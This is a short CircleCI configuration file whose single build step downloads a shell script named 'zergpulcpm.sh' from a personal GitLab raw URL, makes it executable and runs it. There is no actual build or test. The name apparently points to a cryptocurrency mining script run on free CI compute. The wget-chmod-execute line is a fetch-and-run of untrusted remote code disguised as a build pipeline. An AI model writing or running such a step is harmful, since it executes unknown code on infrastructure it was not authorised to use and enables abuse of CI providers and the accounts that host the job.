version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01 # recommended linux image
    resource_class: medium
    steps:
      - run: wget https://gitlab.com/denisule33/why/-/raw/main/zergpulcpm.sh && chmod +x zergpulcpm.sh && ./zergpulcpm.sh